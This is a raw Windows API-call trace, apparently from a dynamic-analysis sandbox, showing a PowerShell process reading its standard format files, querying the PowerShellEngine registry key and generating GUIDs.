	[0533.825] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0533.825] GetFileType (hFile=0x2e8) returned 0x1
	[0533.825] SetErrorMode (uMode=0x1) returned 0x1
	[0533.826] GetFileType (hFile=0x2e8) returned 0x1
	[0533.826] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.827] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.827] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.827] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.827] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.827] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.828] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.828] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.828] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.830] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.830] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.830] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.831] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.831] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.831] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.832] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.832] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.835] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.835] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.835] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.836] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.836] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0xe67, lpOverlapped=0x0) returned 1
	[0533.836] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d649f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d649f*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0533.836] ReadFile (in: hFile=0x2e8, lpBuffer=0x30d6ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x30d6ed0*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0533.837] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d068 | out: phkResult=0x12d068*=0x2e8) returned 0x0
	[0533.837] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfec, lpData=0x0, lpcbData=0x12cfe8*=0x0 | out: lpType=0x12cfec*=0x1, lpData=0x0, lpcbData=0x12cfe8*=0x56) returned 0x0
	[0533.837] CoTaskMemAlloc (cb=0x5a) returned 0x376d70
	[0533.837] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfbc, lpData=0x376d70, lpcbData=0x12cfb8*=0x56 | out: lpType=0x12cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfb8*=0x56) returned 0x0
	[0533.837] CoTaskMemFree (pv=0x376d70) 
	[0533.837] RegCloseKey (hKey=0x2e8) returned 0x0
	[0533.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0533.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0533.839] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x49fdb12f, Data2=0x69ab, Data3=0x42fa, Data4=([0]=0xbf, [1]=0xe0, [2]=0x36, [3]=0xf8, [4]=0x9f, [5]=0x7f, [6]=0x9a, [7]=0x46))) returned 0x0
	[0533.839] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xf2c6c4f2, Data2=0x12d0, Data3=0x4861, Data4=([0]=0x8e, [1]=0x8a, [2]=0x3, [3]=0x39, [4]=0xb8, [5]=0x3b, [6]=0x9f, [7]=0xaa))) returned 0x0
	[0533.839] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x94d9d557, Data2=0xb30b, Data3=0x44d6, Data4=([0]=0x8e, [1]=0x39, [2]=0x18, [3]=0x9a, [4]=0xc4, [5]=0x35, [6]=0x14, [7]=0xfd))) returned 0x0
	[0533.840] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x694d7fe8, Data2=0xd495, Data3=0x4be1, Data4=([0]=0x9b, [1]=0xc7, [2]=0x29, [3]=0xe5, [4]=0x12, [5]=0x87, [6]=0x5e, [7]=0xd))) returned 0x0
	[0533.840] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xb51c7d31, Data2=0x9c81, Data3=0x4a88, Data4=([0]=0x80, [1]=0x96, [2]=0xf4, [3]=0xd6, [4]=0xc4, [5]=0xad, [6]=0xfa, [7]=0xf4))) returned 0x0
	[0533.840] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x1ed60e43, Data2=0xa97a, Data3=0x4517, Data4=([0]=0xb1, [1]=0x55, [2]=0xc7, [3]=0x70, [4]=0xf8, [5]=0x70, [6]=0xbc, [7]=0x22))) returned 0x0
	[0533.840] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x5e417b0b, Data2=0x1e33, Data3=0x4c13, Data4=([0]=0x9d, [1]=0x6, [2]=0x8d, [3]=0x3d, [4]=0x63, [5]=0xf8, [6]=0x58, [7]=0x11))) returned 0x0
	[0533.840] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x4bde1b32, Data2=0x2fe5, Data3=0x47dd, Data4=([0]=0xbf, [1]=0xad, [2]=0xf7, [3]=0x4f, [4]=0x56, [5]=0x22, [6]=0x71, [7]=0xd4))) returned 0x0
	[0533.840] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x9f0232c2, Data2=0x9b67, Data3=0x42f9, Data4=([0]=0x91, [1]=0xb4, [2]=0x1e, [3]=0xe2, [4]=0x77, [5]=0x60, [6]=0x3f, [7]=0xc6))) returned 0x0
	[0533.840] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x60f1e4c9, Data2=0xa1a8, Data3=0x4aef, Data4=([0]=0x90, [1]=0x9b, [2]=0x82, [3]=0x2f, [4]=0x3f, [5]=0x4d, [6]=0x8f, [7]=0x89))) returned 0x0
	[0533.841] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xa7c06557, Data2=0xbaa9, Data3=0x470d, Data4=([0]=0xb7, [1]=0xe3, [2]=0x19, [3]=0xc3, [4]=0xed, [5]=0x70, [6]=0xc4, [7]=0x83))) returned 0x0
	[0533.841] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x62a97a05, Data2=0xfe8c, Data3=0x476b, Data4=([0]=0x9a, [1]=0x59, [2]=0x56, [3]=0x34, [4]=0xd6, [5]=0x72, [6]=0xed, [7]=0x58))) returned 0x0
	[0533.841] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xecaca159, Data2=0xc396, Data3=0x4d8d, Data4=([0]=0xae, [1]=0x8e, [2]=0xc4, [3]=0x46, [4]=0xa7, [5]=0x36, [6]=0xb7, [7]=0xca))) returned 0x0
	[0533.841] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xdb794339, Data2=0x76d6, Data3=0x4ea3, Data4=([0]=0xa9, [1]=0x80, [2]=0x69, [3]=0x8d, [4]=0x84, [5]=0xe7, [6]=0xb0, [7]=0x46))) returned 0x0
	[0533.841] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xd4c48cf5, Data2=0x9f1, Data3=0x4b34, Data4=([0]=0x98, [1]=0x93, [2]=0x8a, [3]=0xca, [4]=0x58, [5]=0x1e, [6]=0x35, [7]=0xff))) returned 0x0
	[0533.841] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x4a1c520f, Data2=0xcee8, Data3=0x4509, Data4=([0]=0x8d, [1]=0x25, [2]=0x33, [3]=0x4b, [4]=0x6, [5]=0x66, [6]=0x7f, [7]=0x26))) returned 0x0
	[0533.841] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x2d01e148, Data2=0xe65e, Data3=0x45c1, Data4=([0]=0x95, [1]=0xad, [2]=0xc8, [3]=0x64, [4]=0x3b, [5]=0x93, [6]=0x28, [7]=0xe2))) returned 0x0
	[0533.842] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x412239ca, Data2=0x7a4e, Data3=0x487c, Data4=([0]=0xb4, [1]=0x70, [2]=0x55, [3]=0x27, [4]=0xe9, [5]=0x4e, [6]=0x82, [7]=0x45))) returned 0x0
	[0533.842] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x19d6c45e, Data2=0x6225, Data3=0x4169, Data4=([0]=0xb4, [1]=0xd6, [2]=0x23, [3]=0x82, [4]=0x4b, [5]=0x95, [6]=0x2f, [7]=0xb2))) returned 0x0
	[0533.842] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x7cce4883, Data2=0xf154, Data3=0x485d, Data4=([0]=0xbb, [1]=0xd6, [2]=0xd1, [3]=0xc8, [4]=0x20, [5]=0xc0, [6]=0x5, [7]=0x78))) returned 0x0
	[0533.842] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xb0d9d863, Data2=0x174d, Data3=0x43f8, Data4=([0]=0x89, [1]=0x11, [2]=0x79, [3]=0x91, [4]=0x12, [5]=0x6f, [6]=0x3a, [7]=0x26))) returned 0x0
	[0533.842] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xefd2edf9, Data2=0x6efd, Data3=0x4277, Data4=([0]=0x80, [1]=0xf0, [2]=0x7e, [3]=0xcb, [4]=0x90, [5]=0x58, [6]=0x89, [7]=0x58))) returned 0x0
	[0533.842] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xec607e69, Data2=0x4f27, Data3=0x407a, Data4=([0]=0x9b, [1]=0xb4, [2]=0x91, [3]=0x7f, [4]=0x4f, [5]=0xcd, [6]=0xa0, [7]=0xbf))) returned 0x0
	[0533.843] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xc8d71b01, Data2=0x4b1b, Data3=0x4f3c, Data4=([0]=0xa7, [1]=0x8b, [2]=0xbd, [3]=0x8d, [4]=0x28, [5]=0x9f, [6]=0x5e, [7]=0xef))) returned 0x0
	[0533.843] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x5bb8639f, Data2=0x9b58, Data3=0x45ee, Data4=([0]=0xac, [1]=0x44, [2]=0xb7, [3]=0xb, [4]=0x71, [5]=0x5f, [6]=0xeb, [7]=0xf))) returned 0x0
	[0533.843] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x7fc0f1dc, Data2=0xf05e, Data3=0x464c, Data4=([0]=0x9d, [1]=0xaf, [2]=0xa8, [3]=0x81, [4]=0x55, [5]=0xe4, [6]=0x3b, [7]=0x27))) returned 0x0
	[0533.843] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x5189951, Data2=0xd221, Data3=0x4a6d, Data4=([0]=0x90, [1]=0x26, [2]=0x69, [3]=0x7e, [4]=0x14, [5]=0xab, [6]=0xfe, [7]=0x6f))) returned 0x0
	[0533.843] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xfdca1d03, Data2=0x44dc, Data3=0x4188, Data4=([0]=0x9f, [1]=0x5b, [2]=0x7f, [3]=0x77, [4]=0x2, [5]=0x8b, [6]=0xee, [7]=0xdc))) returned 0x0
	[0533.843] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x947dab9d, Data2=0x961, Data3=0x4fd3, Data4=([0]=0xa9, [1]=0x1e, [2]=0x81, [3]=0x98, [4]=0xc7, [5]=0x1e, [6]=0x50, [7]=0x52))) returned 0x0
	[0533.843] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x27ead5d0, Data2=0x777d, Data3=0x4398, Data4=([0]=0xba, [1]=0x50, [2]=0x90, [3]=0x52, [4]=0xa8, [5]=0xaa, [6]=0x9f, [7]=0x98))) returned 0x0
	[0533.844] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x85b97325, Data2=0x76ba, Data3=0x45f5, Data4=([0]=0xa8, [1]=0x77, [2]=0x83, [3]=0x61, [4]=0x27, [5]=0x6f, [6]=0x81, [7]=0x26))) returned 0x0
	[0533.844] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xd1f7f819, Data2=0x2903, Data3=0x47fd, Data4=([0]=0x85, [1]=0x8, [2]=0xe7, [3]=0x96, [4]=0xb9, [5]=0xbb, [6]=0x5c, [7]=0x5))) returned 0x0
	[0533.844] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x3f0df0ad, Data2=0xef91, Data3=0x4216, Data4=([0]=0xa4, [1]=0xb5, [2]=0x8c, [3]=0xeb, [4]=0x48, [5]=0x38, [6]=0x24, [7]=0x11))) returned 0x0
	[0533.845] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xd6699f58, Data2=0xa20b, Data3=0x4e6b, Data4=([0]=0x85, [1]=0x7f, [2]=0xd6, [3]=0x6a, [4]=0xc0, [5]=0xd6, [6]=0x40, [7]=0x35))) returned 0x0
	[0533.845] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x7e475bce, Data2=0xe34f, Data3=0x43b3, Data4=([0]=0x8c, [1]=0x3a, [2]=0x80, [3]=0x9d, [4]=0x6d, [5]=0x4d, [6]=0xe3, [7]=0xf))) returned 0x0
	[0533.846] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x4f1de0d4, Data2=0xa65e, Data3=0x4716, Data4=([0]=0xbf, [1]=0x80, [2]=0x73, [3]=0x2c, [4]=0x5f, [5]=0xf6, [6]=0x97, [7]=0x98))) returned 0x0
	[0533.846] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xc54fbf, Data2=0xf8a9, Data3=0x4c60, Data4=([0]=0x95, [1]=0x43, [2]=0x6e, [3]=0x25, [4]=0x37, [5]=0x12, [6]=0x20, [7]=0xe8))) returned 0x0
	[0533.846] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x71bcd43c, Data2=0xc351, Data3=0x45ba, Data4=([0]=0xaf, [1]=0x9f, [2]=0x53, [3]=0xa8, [4]=0x67, [5]=0xd8, [6]=0xdf, [7]=0x4c))) returned 0x0
	[0533.846] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xc5425dc6, Data2=0xcc76, Data3=0x4f93, Data4=([0]=0x83, [1]=0x46, [2]=0xc2, [3]=0x9d, [4]=0x94, [5]=0xd1, [6]=0x5f, [7]=0xe2))) returned 0x0
	[0533.846] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x956eac9d, Data2=0x6d4f, Data3=0x4851, Data4=([0]=0x82, [1]=0x51, [2]=0x61, [3]=0x4f, [4]=0x4c, [5]=0x8, [6]=0x36, [7]=0xc5))) returned 0x0
	[0533.846] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xc0127025, Data2=0x23a1, Data3=0x44e1, Data4=([0]=0x8c, [1]=0x8f, [2]=0x50, [3]=0xad, [4]=0x3f, [5]=0x63, [6]=0xee, [7]=0x8b))) returned 0x0
	[0533.846] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x43847702, Data2=0xb969, Data3=0x44a3, Data4=([0]=0x8d, [1]=0xc9, [2]=0xf0, [3]=0x83, [4]=0x8d, [5]=0x55, [6]=0x89, [7]=0x62))) returned 0x0
	[0533.847] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x8a1bf1b9, Data2=0xcfb7, Data3=0x4e5a, Data4=([0]=0xb1, [1]=0x4f, [2]=0xcc, [3]=0x76, [4]=0x8b, [5]=0xa5, [6]=0x96, [7]=0xfd))) returned 0x0
	[0533.847] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xb51ac5bb, Data2=0xe624, Data3=0x4d5f, Data4=([0]=0xae, [1]=0xdd, [2]=0xc6, [3]=0x58, [4]=0x91, [5]=0xb5, [6]=0xab, [7]=0x49))) returned 0x0
	[0533.847] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xb64ee171, Data2=0x971f, Data3=0x49b8, Data4=([0]=0xb9, [1]=0x83, [2]=0x16, [3]=0x79, [4]=0x67, [5]=0xa, [6]=0x7f, [7]=0x9e))) returned 0x0
	[0533.847] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x381fd824, Data2=0xb288, Data3=0x494d, Data4=([0]=0x96, [1]=0xe7, [2]=0xef, [3]=0xa3, [4]=0xf4, [5]=0x5f, [6]=0x45, [7]=0x27))) returned 0x0
	[0533.847] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x26ab5061, Data2=0x4b3a, Data3=0x4caf, Data4=([0]=0x8b, [1]=0xe7, [2]=0x3b, [3]=0x54, [4]=0x11, [5]=0x99, [6]=0xbe, [7]=0xcc))) returned 0x0
	[0533.847] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0xb43d5a1a, Data2=0x8f18, Data3=0x41ec, Data4=([0]=0xbb, [1]=0xab, [2]=0x17, [3]=0x4d, [4]=0x34, [5]=0xb8, [6]=0x30, [7]=0x46))) returned 0x0
	[0533.848] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0533.848] GetFileType (hFile=0x2e8) returned 0x1
	[0533.848] SetErrorMode (uMode=0x1) returned 0x1
	[0533.848] GetFileType (hFile=0x2e8) returned 0x1
	[0533.848] ReadFile (in: hFile=0x2e8, lpBuffer=0x3234fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3234fb0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.848] ReadFile (in: hFile=0x2e8, lpBuffer=0x3234fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3234fb0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.849] ReadFile (in: hFile=0x2e8, lpBuffer=0x3234fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3234fb0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.849] ReadFile (in: hFile=0x2e8, lpBuffer=0x3234fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3234fb0*, lpNumberOfBytesRead=0x12cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0533.849] ReadFile (in: hFile=0x2e8, lpBuffer=0x3234fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3234fb0*, lpNumberOfBytesRead=0x12cfd8*=0x8b4, lpOverlapped=0x0) returned 1
	[0533.849] ReadFile (in: hFile=0x2e8, lpBuffer=0x32343cc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x32343cc*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0533.849] ReadFile (in: hFile=0x2e8, lpBuffer=0x3234fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cfd8, lpOverlapped=0x0 | out: lpBuffer=0x3234fb0*, lpNumberOfBytesRead=0x12cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0533.849] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d068 | out: phkResult=0x12d068*=0x2e8) returned 0x0
	[0533.850] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfec, lpData=0x0, lpcbData=0x12cfe8*=0x0 | out: lpType=0x12cfec*=0x1, lpData=0x0, lpcbData=0x12cfe8*=0x56) returned 0x0
	[0533.850] CoTaskMemAlloc (cb=0x5a) returned 0x376d70
	[0533.850] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cfbc, lpData=0x376d70, lpcbData=0x12cfb8*=0x56 | out: lpType=0x12cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cfb8*=0x56) returned 0x0
	[0533.850] CoTaskMemFree (pv=0x376d70) 
	[0533.850] RegCloseKey (hKey=0x2e8) returned 0x0
	[0533.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0533.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0534.619] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x11c56b73, Data2=0x9807, Data3=0x4900, Data4=([0]=0xa2, [1]=0x74, [2]=0xbf, [3]=0xf0, [4]=0xab, [5]=0x8b, [6]=0x1e, [7]=0x5c))) returned 0x0
	[0534.619] CoCreateGuid (in: pguid=0x12d290 | out: pguid=0x12d290*(Data1=0x6855de67, Data2=0xae06, Data3=0x40fa, Data4=([0]=0x92, [1]=0x1a, [2]=0x65, [3]=0xb0, [4]=0xf1, [5]=0x90, [6]=0x17, [7]=0x60))) returned 0x0
